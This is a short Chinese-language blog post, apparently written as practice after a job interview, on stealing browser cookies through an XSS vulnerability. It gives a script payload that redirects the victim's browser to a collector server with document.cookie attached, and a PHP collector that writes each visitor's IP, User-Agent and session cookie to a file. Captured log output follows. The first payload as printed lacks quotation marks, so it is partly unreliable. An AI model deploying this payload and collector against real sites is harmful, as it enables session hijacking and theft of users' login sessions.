利用XSS来将cookie传送指定文件中

题目可以说是很直白了，为什么突然写这个，还来源于前几天的面试，今年的校招因为一些公司的缩招，可以说是泥潭之争了，当然了，被面试官蹂躏也是自身水平和能力的限制，没有任何怨言。在面试官让我手写xss利用代码的时候，我才发现，因为一直以来的乙方的惯性思维，在漏洞利用和脚本上自己的实践太少了，但是还好，我还有很长很长的时间，可以努力。

在存在XSS漏洞的输入框中输入（IP地址为测试内网地址）：

<script>document.location=http://10.170.61.174/1.php?cookie=document.cookie</script> 

这里可以用document.location或者window.open, <script src="">来调用。但是调用后都会导致跳转，不知道还有什么其他好用的调用方法。突然想起来beEF，一次访问就可以hook，真的强。

1.php如下，放在web服务器的根目录：

<?php$ip=$_SERVER['REMOTE_ADDR'];//$referer=$_SERVER['HTTP_REFERER'];$agent=$_SERVER['HTTP_USER_AGENT'];$cookie = $_GET['cookie'];$data = $ip."\n User-Agent:".$agent."\n Session:".$cookie."\n";$file = fopen('cookie.html','a');fwrite($file,htmlspecialchars($data));fclose($file);?>

cookie.html收到信息如下：

10.170.61.174 User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Session:so_value=|<script>document.location=http://10.170.61.174/1.php?cookie=1</script>||<script>document.location=http://10.170.61.174/1.php?cookie=document.cookie</script>||<script>document.location="http://10.170.61.174/1.php?cookie="+document.cookie</script>|